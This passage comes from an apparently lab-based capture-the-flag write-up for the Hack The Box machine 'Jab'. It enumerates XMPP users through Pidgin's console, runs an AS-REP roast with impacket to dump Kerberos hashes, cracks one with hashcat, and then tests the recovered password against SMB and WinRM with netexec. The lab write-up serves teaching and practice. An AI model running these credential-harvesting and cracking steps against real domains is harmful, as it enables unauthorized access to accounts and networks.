loading="lazy" decoding="async" /> </a> </span></p> <p>This resulted in a list of all users:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/51a704f323f4fc711ae5bc4ae86a409f/a1ee8/pidgin-search-results.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 74.0506329113924%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAA7DAAAOwwHHb6hkAAACf0lEQVR42lVU6XqiQBD0UTZGAwhygxwiHiCI5txk3/9NarsaSXZ/zIfOdNfR3TOzyC/xuFzLcrF48u5fV78Pjw6iZIe8OML1MzwsxjiuufyeT/8lT3P8AbOVkyLN9giiLbygQBCWCONKV7KpYa5izB/XWCwnMl/X0gywNII7qKd7PJ85/gbF9iygJ2RliyDewXLGvaruYa8zAT6gqDqESY2VnJmrBEl2QC7xSXYU8hqWvZG8GDM/KVAfb+iH37hcvzTAkIT96RnlrseTFStY272jOb+J9VLPSd4NnxhufySug2mnan3mxzmq/YBT+yrrBVFaS0Kqe5ui0eRc1JKgqi/fgGne4HR+FZJXiTuNgLQciMLdYcD58oH++omdAFlik4BUtPYLVXMUsrZ/V5tUTTLmdMOXCnG8AvMJcH+6qUJN2LawXZJcBfyigVRzbF60BI6Xq5pi26nCs+RQOYkVkDWkmkNDBR+aZLs5thJEtWuxSIWH5llJ/KhSy1SoOVLb+nCDG5Q/gHsJ7qUhDFiJ3akp7PjSjLSGPKtE8XROksvtC40A+uFWy3BvinRZLFMdVVGd6WQopbM/alq1R2AdG7HMvU4moxbVngBy7z/Lx5b1+NCZ0y7XgwJol6tRIceL1qYuc485nNl/AEsFZC066VqY7L/Hhg2aOsous4Ys/gRIu73MIu1bDufQnQb7qiPAANbNEDaqIRABM1HAERqbVCjhSCKT0b0hFlcLIxoVGqsAjruB5+dYy/fJDIXJ1z3DivSe8r7zcbDs+H5nPay9QhuXSS1Z6zRrxHaEGS83X5Vfc1u/88XPSzO9JlMM1/R/Yfg6UpadiN1EHpdK3IT4C+gB7cMjMcIdAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin search results" title="" src="/static/51a704f323f4fc711ae5bc4ae86a409f/50637/pidgin-search-results.png" srcset="/static/51a704f323f4fc711ae5bc4ae86a409f/dda05/pidgin-search-results.png 158w, /static/51a704f323f4fc711ae5bc4ae86a409f/679a3/pidgin-search-results.png 315w, /static/51a704f323f4fc711ae5bc4ae86a409f/50637/pidgin-search-results.png 630w, /static/51a704f323f4fc711ae5bc4ae86a409f/a1ee8/pidgin-search-results.png 706w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I needed a way to extract these names into a text file, so I went to <code class="language-text">Tools</code> → <code class="language-text">Plugins</code> to look for any useful plugins and found <code class="language-text">XMPP Console</code> which can be used to send and receive raw XMPP stanzas:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 435px; " > <a class="gatsby-resp-image-link" href="/static/53b73eb885515a42789a5687d11c0f51/e290a/pidgin-xmpp-console-plugin.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 128.48101265822785%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAaCAYAAAC3g3x9AAAACXBIWXMAAA7DAAAOwwHHb6hkAAAFAklEQVR42m1V2Y4bRRT1fxBmvHW77fbedrvbbq/tfV9ny2SyiAQiBA954gkkpAjEIkBIUVhEJiGJSECIBz6HX0GHc8tjCNE8XFVXd9Xpc889tyrQ9ybQ9Cz2QwmEoymEIoxwcvscNpHOldEfzJEvePxmIqKlEOG38P8iCc10EWp8gEA2X+HiGqxiDbGEhUTKRiZXgZEoIqrnoBt5vitxXkCEc3mnxfLQjG3ocUuF7AvFLARSmTKsUgOWLYBF1Joj3Lh1F93BEg1/gmpjyOcVOr0l/O4Mg/EGlVofTqWDfLHBPTaMZAlmymEGCQT0eEH9KaxlFKBT6WI8PUJvuILfmSrQdm+xBRttMJocqm/t7pzrDuHV+2h2ZsjlPexHkggYZhHxJP9iEpjgdQKsDs7QIavJ7EgxmsyOMeTokVmjNWZGTZhpF5l8FUlmmMpWOLoIRi8AYwlhmVUMy7UBTk7fIqM5hpONYrVYn5HthAXykLVqMLlZ0oxfhGHaKkIskAKUiYBJ+l59iNnyKoHIcH6s0qvWB2TXg841miFFKG7XM2LcuwMOvcowGsuqhV5jREbX0O0vlV5Tggrbbn+htGy2p4wJmpRG1pS9ngL/F3A7EcpFBSgVHBJoOFqT3ZqMB6rSZa9LrcoqbdFPtBMN5d1rDG3lv2hsW2VJebo4YREOMGZROmTRH65V6rui9AZbGcy0o4ASKedyhvLskol4sMU0pcIdptplquJPCdtpKZZS2Z3uEtuivMZQaUiGy801ZRkpymR+oizTJ0OpuICKLHWOLvWrKNYjJUHwP4ZbDQSwXO0rw0oB2jSzMBYNK9UecmxRsY1lN9R7GSUKpZbSNbhjKL0Y0XcaDrA+vK70U9XuzZWGNVa/TNBqfVsgWbuzm3FhndCrDHcfJY0+U/PZTi1apO6PlUWkBYvsEMtuKlY77WKXabhlmFaN7lR6WB9cZ5ypas9Xp6qnxX9OuY1SuaMOhnpzTCkGWx0pU5onlOoU5fSUy3Do/BJciiz+6w7W8KmjjKPpsdK0RsvU/SlK/GnBabOnfeTtFn/SRTLrIZG2ydBIQdfiCIejHE1Uqz42mxOsVodYLAg2nmM+X/HdMcbDCXodVrjahFOqoOJWUbBKiOkmdEYqUyTD/n3El98jMX8AbfoAxZMfMHvvKdpv/4zqzXPUb53DufYI3s0ncG88Q+roMazTpyicPUfp+nNYVx8jvngIff4QKXeJgHbvL5ifAPZnfyP8EdD4Btj8CPS+BSYPgdl3QPNrvv8KqHwBOJ8DmfuA9SmQ+BiIfAgYHHVGsvc+GY6/RPzgGeLrc+irc7i3XmJ070903v0D1du/on7nNzTv/o7a7RdovvMS9du/oHHnBdk/QfbwJ2iLRzC4N8a9yfKagNEYIsF9hPauILIfQqPexOnRAaZjHrQz6sdxPp3xeYblbIGO30HX92EXSshncijkcjCNOAxNRzpTQCDJniw4PnLFOqOBqvQsW0nuC9u9sAmtYbu+6g4xd4m2kZaTuVhIDlvNED/meUllHfbiEL3+lN3Qh98eIZsvYy8YR5DX6JW9GN7Y0/HmvsFnQ83lmg0y9kOmun5DvEsiWlpFQCaycTtuQz6Eo2n2Z4kdMqL32HZeR42222R3WOwWn8z7PJUWaHV4b3Mux1ggyh6+LOQC14wccpbHtHlkZV111Watsvou7SonjBwWecolYHKH/wNh0IjXCPvCtQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin XMPP console plugin" title="" src="/static/53b73eb885515a42789a5687d11c0f51/e290a/pidgin-xmpp-console-plugin.png" srcset="/static/53b73eb885515a42789a5687d11c0f51/dda05/pidgin-xmpp-console-plugin.png 158w, /static/53b73eb885515a42789a5687d11c0f51/679a3/pidgin-xmpp-console-plugin.png 315w, /static/53b73eb885515a42789a5687d11c0f51/e290a/pidgin-xmpp-console-plugin.png 435w" sizes="(max-width: 435px) 100vw, 435px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After enabling the plugin, it showed up in the <code class="language-text">Tools</code> tab:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 597px; " > <a class="gatsby-resp-image-link" href="/static/67d1f33233a9f8ad33bc208843369c6c/4af63/pidgin-tools-xmpp-console.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 92.40506329113923%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAA7DAAAOwwHHb6hkAAACzklEQVR42o2US2/TQBSF8x/a1LGTOInjx/j9GseP0MSJSpEoQgKBKlXqCpawBLFDbPpP2IPUSvy7w/XYNCVtpS6OJkpGn+855zq9gtfwwxyWncD1MzA6dTsHz7coyg00PRCaG2GnCLrhQw9PoGhb9KUSR4Ml+oNKfO4FSYVssYYXlkjp9KMlZtEZHH6KNCtheyk0w4M6Y5hqjpBuxTBZiOGYE2yFI7kBttCe5WSwnAWYS/JyGCyBMtEJXtKUS9hBjNF0DkXVMBjNII/nsOiu4xcYTXIBlORnt1P2GpBNoFYFbJcjiwM4AUfMS7hhClWzCKRhZjhCzRCOv2iBck3A4w64RM/eAzo+R7n2ECYE92PozMdMt8V0bsjp95SAzZkTsGiBys72PSDzOIIiQ5JVBM0x1ZmYrpHtJwLaAhcYE1DqgH2yfQ/Y5GLanJr0EKQ55RpSGabIVFHnlKUhtLNMDSsb0roFyg8CUwynJiJeIKaWG1CjZkKLHmB78S1w3AElAjY53gM2EpeDXJThRxmJYziZYyCAEd2JhAsBnDbALaThms7jxydU5w7S/FgUM9FdyKpBtk2a3MKI9tFys1ugNPwHXD0CZDGmkzHCwEMUejANDdLRAeRBn3QIRR6AkQtGUGVc4HCwvZPjvmW6ZIUbuC+/o3x/her8CtnbH5jWXzFefYFaf8Ns9RmanSGIcnJTQTNXlDG9McNCFHMHSHvnJGD8FdjFL2Qfb5B9uAYnOZc3MC+uwS7/wDn/iRlrs7VpF02X3pipR7bTfeBuSttyySrJbMUsh75rxSyvK4+T5RwHUt1ZXj3cspBfUp472ftq8g6KrpRNV0q3h23ABBXgp4oeaodkddHu4XC1A3pRAS+q4AalaPkpavL2yze0QksC1f8Dl6c1Ts5e4+TFO2Tlc9q9NaK0flQJ3yDKNkg//YbKzuhfpiIgLbVCfw5yhb+K7iWatf+C5QAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin tools XMPP console" title="" src="/static/67d1f33233a9f8ad33bc208843369c6c/4af63/pidgin-tools-xmpp-console.png" srcset="/static/67d1f33233a9f8ad33bc208843369c6c/dda05/pidgin-tools-xmpp-console.png 158w, /static/67d1f33233a9f8ad33bc208843369c6c/679a3/pidgin-tools-xmpp-console.png 315w, /static/67d1f33233a9f8ad33bc208843369c6c/4af63/pidgin-tools-xmpp-console.png 597w" sizes="(max-width: 597px) 100vw, 597px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>XMPP console:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 584px; " > <a class="gatsby-resp-image-link" href="/static/1eb7f07932df748aad0606d5f323bb68/0fa65/pidgin-xmpp-console.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 73.41772151898735%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAAxklEQVR42u2UQQ6CMBBFexWEtrQCQlukIEiMCw/g/c/ybbtSCQrRnS5eZzKZ/GmT/iGNOiJKMmyS/IEozpBKjWG8oOvPULoPtec+T0x3YMxFfQWhvAQTepaYlaBcgQr1ss9DeQXCpYHMW4f9kBZcGBDmDpE1X8CGW/4Ff1DQTppWC/rf/c4BSwlO8X4tVYeitKib0Xn2AJnVMPsBTXuC2OpZD089XXhBE5YAdxN87q3IUuWids+oQ74UvxcIF3eFQDXJ1wjeALmTydERl2YsAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin XMPP console" title="" src="/static/1eb7f07932df748aad0606d5f323bb68/0fa65/pidgin-xmpp-console.png" srcset="/static/1eb7f07932df748aad0606d5f323bb68/dda05/pidgin-xmpp-console.png 158w, /static/1eb7f07932df748aad0606d5f323bb68/679a3/pidgin-xmpp-console.png 315w, /static/1eb7f07932df748aad0606d5f323bb68/0fa65/pidgin-xmpp-console.png 584w" sizes="(max-width: 584px) 100vw, 584px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The XMPP documentation <a href="https://xmpp.org/extensions/xep-0055.html" target="_blank">here</a> shows how to search an information repository.</p> <p>I sent the following search request using the wildcard (<code class="language-text">*</code>) character to return all users:</p> <div class="gatsby-highlight" data-language="xml"><pre class="language-xml"><code class="language-xml"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>iq</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>set<span class="token punctuation">'</span></span> <span class="token attr-name">from</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>test@jab.htb<span class="token punctuation">'</span></span> <span class="token attr-name">to</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>search.jab.htb<span class="token punctuation">'</span></span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>search1<span class="token punctuation">'</span></span> <span class="token attr-name"><span class="token namespace">xml:</span>lang</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>en<span class="token punctuation">'</span></span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>query</span> <span class="token attr-name">xmlns</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>jabber:iq:search<span class="token punctuation">'</span></span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>last</span><span class="token punctuation">></span></span>*<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>last</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>query</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>iq</span><span class="token punctuation">></span></span></code></pre></div> <p>This resulted in a full list of users in XML format:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 583px; " > <a class="gatsby-resp-image-link" href="/static/0fd50ae1bae96da0b8ebe44add7fc010/d8a90/pidgin-xmpp-console-search-results.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 125.9493670886076%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAZCAYAAAAxFw7TAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAD9klEQVR42p2T21MTZxyG80+ozDjTA3KSghwFteN0+j/0tu19b3rfC0tFTlJUxNbpjM5YD53OdNoZHKVQCwlJNskesoTECAlQbYtCThAQCYTD098mUNTqVLh45nu/3W/fffd797NVlx9nX8Eh9h/Is6MLOXiwlMojx3mvopGioir27S/Mrzmwsz5HQREFsvad2o+wffzpJ1zqauFczxnO9rRyvrOJzksdNH/dRsuFNjrPNctcdHerzFtpOy9rL7bQ2tNOh9zr6vySrstn6bjwFTX1x7B1X2ljPh0mMubh0aSTRzEFI92POXcPY26A8fQwsUyAx5kRHi+bzGRMZoUnK3k9s6iT3AgSiQ1z4oMPsbX3NBHbMDGDg4SjDkbDdkJTdqLJYcbjDiJxpyx2Eo3vEHlJT6UUfGN3qG04jq2ju4nphEn4DweTKTeTSTdTSUXYHpXctdcxkXDxKO1Fj/aJ4QkxvCiGKTGc2jHcDf8xbO9q4knaTzTlZCLpkk99joRzS7v/ZeI5ncfFwwUv6rZh9xdnWBhSiXlczGo6aa+Hed0goRmkh10sqj5imsaM18cTj49FzUtcU/nL7eOxzBdMDcYCTDsHOVovht+eamHZFeLP2wpP7ylkVZWU4eCp4WLBcPJM94A+wqZh5mCL7fmG4YfAKPFBOw11Yni1pQ3CEeK9HuZ67cw73Tx0DzFpHyLqGGRWcYMpD4+8CNYo1zdMMQyOErOLoZXw6ulWmIyyqurM3/Wx4pU0wftkR0Ks6kHSv2qsa/6cgWX8Mpt+uTcqCYe2EzaL4USUhd98zN3xsq77yRp5VkWv+gzwv9rs1Yan84ZPpZi5226euTVSip+EyyDu1Jkb0tjYS8KMR8t93poRgPtBIQShUZYdOlmvsXvD1F0vqV43yx5p2amRcKgkhlVWdKvFPXxy1ipF9jDjMVkLhsgGgiy5/KT71V3u4VbCtJQy3+eV/8ogaxUjrKhGrpg9JVyyqyR/cbHkltOimiTdBkkpJzmokZFydr2Hy9Juul/+Of9IvhT5Wa1xTTNZVYw3T3jFShiNkOqzSpGEio/kcL6QWXter8j+Wg9uvIJ12SICAWKDQ1sJ2zph+m/WzCCZAZN1MwzjUTbHhEiUFUUKUiTt+AM5osKDF9kMh3OB4opHjt772E599jmhn37m92+uMXD+Gp7rN/HdvIVXRs/3N/BdF33jFr7XYK3Tf/iR/svfUVPViK24rJqKIw2UV9ZT13iSyupjlByuoar2BHVHT1JUWs1b75bzduH/U1hcia20vE7MGigrr8+N5RXbulFedIxS0cVltW/EoZIqbCUiSg7X5S4UldbkRmtuaQtLvylFJdX8A59N8bJQhavnAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin XMPP console search results" title="" src="/static/0fd50ae1bae96da0b8ebe44add7fc010/d8a90/pidgin-xmpp-console-search-results.png" srcset="/static/0fd50ae1bae96da0b8ebe44add7fc010/dda05/pidgin-xmpp-console-search-results.png 158w, /static/0fd50ae1bae96da0b8ebe44add7fc010/679a3/pidgin-xmpp-console-search-results.png 315w, /static/0fd50ae1bae96da0b8ebe44add7fc010/d8a90/pidgin-xmpp-console-search-results.png 583w" sizes="(max-width: 583px) 100vw, 583px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I copied the search results and then extracted just the usernames:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ awk -F"'" '/jid=/ {split($2, a, "@"); print a[1]}' pidgin-users.xml > users ┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ cat users lmccarty nenglert aslater rtruelove pwoodland pparodi mhernandez atorres apugh lray &lt;...snip...></code></pre></div> <p>With the <code class="language-text">users</code> list, I ran an AS-REP roast attack and obtained hashes for three users:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ impacket-GetNPUsers jab.htb/ -dc-ip 10.10.11.4 -usersfile users -outputfile asrep_hashes &lt;...snip...> $krb5asrep$23$jmontgomery@JAB.HTB:4a636ac76c023ab801d80e135987b6b9$1208fb2dd0696d2987180fa5cae2bccc24afd7251760643b13528c1bea15b4e3aa843b72ea35bbacc99b6f0f54f848c06938f5bcd3d11fcb1eaa0e94980b132752337c5e5e3d13f320425fa67b2cc1a741d4d34a9ca13bdfb26cada0f51cb72604522818d8e5a5982bc19ea11a070a4b92f37fee4fc2904d14decf0b1f366b568638dfa128256ba3ac8f1f677acf8573d0244d4bedc6f16b24a41de1f041110d93921ed7637a7ce83f86c7dee666fff77cdc5ebf7c9cfad80e3e2c514fa6a62f252dd4af5913e46750de558782a6e2f28aa27ecc255700e93eaf152e8ede71237134 &lt;...snip...> $krb5asrep$23$lbradford@JAB.HTB:a716122b9b9c5fcb986325f365934808$ccb6e23df76d3c15449870ad1766a8d2c4ba31d93ab37ba88893211a1b69a82f60b1d747d02776d38b56e1e86a9725097c2925daaa398517d4d45ea2f2b4b98a02f036710ba46a9803fb136b1815672028b987badcc329d5a2cf1a950ac4755aa0b3373f3b37b0d0ff55b8259434996fbd487ab1fac1420d930523e7c7d5fdb8d6a433a5a5b89251bd1dfb3bb10ef2a663f004faaea5069303920a80c1841f0fb981a57221c02c30249f77743e57e9a90bfc540298f13de61238f98901ec373dd042354d20d40fbdf6fe7c4d81e487fb64693c564151fa5eaa7573f96c52201f56e5 &lt;...snip...> $krb5asrep$23$mlowe@JAB.HTB:7445c84379e8ad9ef3a1f0820fac5333$aed2edd49ac08255e89f25b56c58151ef39d11fc7b79f2f806d35f66fcf04e5da36b25af9e84b4af38e6c7f06709b7bf3e50597f7c49d80f2476f09d9351a37b3fbc295e79befe2ab2235dfdb47ea849307534fbc14f11e26f80d1b3614d2225cd6f93b2d8d91eb08c58b9f973ee6988f124b75fdc3ef907be5e28b22b40c731f64189153aa8be012207a913945db0802f27a9a5a194d1ae23b8d73cec36757d5e89be212da5051c2279a1f83fc6dba73483b117549ec0786397dc82d7f5b384ab8fa451723c0c327ba739ea6b51cb7019c8da17e5564c66d14e01cab41e41463d06 &lt;...snip...></code></pre></div> <p><code class="language-text">hashcat</code> successfully cracked the password for one of the users, <code class="language-text">jmontgomery</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ hashcat -m 18200 asrep_hashes /usr/share/wordlists/rockyou.txt &lt;...snip...> $krb5asrep$23$jmontgomery@JAB.HTB:4a636ac76c023ab801d80e135987b6b9$1208fb2dd0696d2987180fa5cae2bccc24afd7251760643b13528c1bea15b4e3aa843b72ea35bbacc99b6f0f54f848c06938f5bcd3d11fcb1eaa0e94980b132752337c5e5e3d13f320425fa67b2cc1a741d4d34a9ca13bdfb26cada0f51cb72604522818d8e5a5982bc19ea11a070a4b92f37fee4fc2904d14decf0b1f366b568638dfa128256ba3ac8f1f677acf8573d0244d4bedc6f16b24a41de1f041110d93921ed7637a7ce83f86c7dee666fff77cdc5ebf7c9cfad80e3e2c514fa6a62f252dd4af5913e46750de558782a6e2f28aa27ecc255700e93eaf152e8ede71237134:Midnight_121 &lt;...snip...></code></pre></div> <p>The user didn't have access to any interesting shares:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ netexec smb 10.10.11.4 -u 'jmontgomery' -p 'Midnight_121' --shares SMB 10.10.11.4 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) SMB 10.10.11.4 445 DC01 [+] jab.htb\jmontgomery:Midnight_121 SMB 10.10.11.4 445 DC01 [*] Enumerated shares SMB 10.10.11.4 445 DC01 Share Permissions Remark SMB 10.10.11.4 445 DC01 ----- ----------- ------ SMB 10.10.11.4 445 DC01 ADMIN$ Remote Admin SMB 10.10.11.4 445 DC01 C$ Default share SMB 10.10.11.4 445 DC01 IPC$ READ Remote IPC SMB 10.10.11.4 445 DC01 NETLOGON READ Logon server share SMB 10.10.11.4 445 DC01 SYSVOL READ Logon server share</code></pre></div> <p>No WinRM access either:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ netexec winrm 10.10.11.4 -u 'jmontgomery' -p 'Midnight_121' WINRM 10.10.11.4 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb) WINRM 10.10.11.4 5985 DC01 [-] jab.htb\jmontgomery:Midnight_121</code></pre></div> <p>Next, I added <code class="language-text">jmontgomery</code> to Pidgin:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 522px; " > <a class="gatsby-resp-image-link" href="/static/61d1184ac53f48e4b1265c5d796d8681/03dc1/pidgin-add-jmontgomery.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 66.45569620253164%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAA7DAAAOwwHHb6hkAAACEUlEQVR42rWTSW4TQRSG+yp219DV7nl0t2cbgxAB24pkUBjFJhKEDSBfAQkJCUECETdgwQkIQkgoixyATQ7z87oajJ0VC1h8qnpjV1W/3yiTIZrMRcN00eQ+7T1tm9wDkz6SbIB2MYJUIeU469gmnPK4ytDM9mAIFcML2nC8Nmw7hONmsN0CzIphighCpUQCq5Wj5RWa2rcNJ6rmhuQC+WCONOshntxBb7rEpF+ik+dIggCScfCGiSjyMRl0Mer34SoLijHYnK9RnIExG0az+xjek3M4D7/DXZ2jXP3A9NkppqszjJ6eovPoBOn+VxT7H3Hp4BMmz88o9wvE3RPIe7/5DPngG1h+GwZr34e7e4zW7A3U4hXC3ddIl4eIl2+R3jxEsXeE5NYxwsVL4gWi5Xuo+RGs+bsNyF58AItmMDhXdFwBS0goQjIJwQStNXpvckjK09ATWEJQ7kU4GG9RQ3p85XaIco19Ya0p9M9SW75tmAyrhiGUk/8TmAz+S8OIjHaNS7P4C+X+na02bH1lJmjKaVNRKaOe/tpXxap9bQc06D4aWik+xQJ9oiqnWalK+BqjbuCiunqcjtEb7aDoXCFlpPCLq+iNZxhObugfkuRj7Mz20B1eQ5gMtC8vL2Mwvo6Ias0/Desv2G4OP+6SFEt9QkkFXtSl4h5pOaZ4hqw9RkA+28lIchEcv9DxqraS3k/K8qjphbHH7gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin add jmontgomery" title="" src="/static/61d1184ac53f48e4b1265c5d796d8681/03dc1/pidgin-add-jmontgomery.png" srcset="/static/61d1184ac53f48e4b1265c5d796d8681/dda05/pidgin-add-jmontgomery.png 158w, /static/61d1184ac53f48e4b1265c5d796d8681/679a3/pidgin-add-jmontgomery.png 315w, /static/61d1184ac53f48e4b1265c5d796d8681/03dc1/pidgin-add-jmontgomery.png 522w" sizes="(max-width: 522px) 100vw, 522px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To check if the user had access to any more chat rooms, I went to <code class="language-text">Tools</code> → <code class="language-text">Room List</code>, and clicked <code class="language-text">Get List</code> for the <code class="language-text">jmontgomery</code> account.</p> <p><code class="language-text">jmontgomery</code> had access to another room, <code class="language-text">pentest2003</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 575px; " > <a class="gatsby-resp-image-link" href="/static/83eca8fd8ab2c80c08c0cd8a386a97cf/facd4/pidgin-room-list-jmontgomery.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 74.0506329113924%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAA7DAAAOwwHHb6hkAAACAElEQVR42s2Ty27UMBSG8ySdyd253+MkziShnaq0I3ZQKlawACQ2QFUh4BX6cu0gdcWOB/k5dkYVFJCo2LD44vzHxyc+dn6N5yMMKyQi6GaApRFA37HQfZT1CnUzwmGpmp9zf8Z0YlhOAqM6g+b5OfywhB9VyKoBWTkSA4pqQlFPSlfNPvJqpJwGQdz+ligVcP0SWphw5GWPKGvQrA6xGk8ghofoidV0gm44otgxeLemhR3CRPyCjMsPs4AKMi9FntVw3RiG4YGxGGlaEbV6lzHT9GFaARwn/DN2AIva15x0jX7zGuX0DGH7GHz9HN3RCyT9U0UsThUREbZEdwqvucsT+O0Z7GiCZh5fQnz6hunDF4jza4iLG0wfb8DfXaE736J9v6X4Fh2NLY312y3cV3d4eQX3zVdYB5+hWW6Oul3TBdBN+tQqnYXULKjhhfxe2CyjlllBi7nCCxtVyFXFmntjs3wuOAf4P3O7w/+7oHx4IZ0ZnRsLKnWG6kJ2498i822XCkov7i097C0YluTdpeGTZkovdI9i85yM3Wr5TsjcxQ9a1tJ0M0Ja9GjEAXmxIL9yjPuP0I8b5Wnp0eHBBgPF0rxXWpA9eXdIu+KUM5FVZ73bYUQTFZKsg0vXbtN/mWQCCS2WcUaGl4WSXCjteiXiVHq6Vbmy1ZjyI9KmneA72E7j7h4RfkUAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin room list for jmontgomery account" title="" src="/static/83eca8fd8ab2c80c08c0cd8a386a97cf/facd4/pidgin-room-list-jmontgomery.png" srcset="/static/83eca8fd8ab2c80c08c0cd8a386a97cf/dda05/pidgin-room-list-jmontgomery.png 158w, /static/83eca8fd8ab2c80c08c0cd8a386a97cf/679a3/pidgin-room-list-jmontgomery.png 315w, /static/83eca8fd8ab2c80c08c0cd8a386a97cf/facd4/pidgin-room-list-jmontgomery.png 575w" sizes="(max-width: 575px) 100vw, 575px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I joined <code class="language-text">pentest2003</code> which was a conversation discussing a pentest. In particular, commands were posted related to a finding about a kerberoastable account, <code class="language-text">svc_openfire</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a5ef066151b30774bd33ebca532e5a8c/06b13/pidgin-pentest2003-user-with-SPN.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 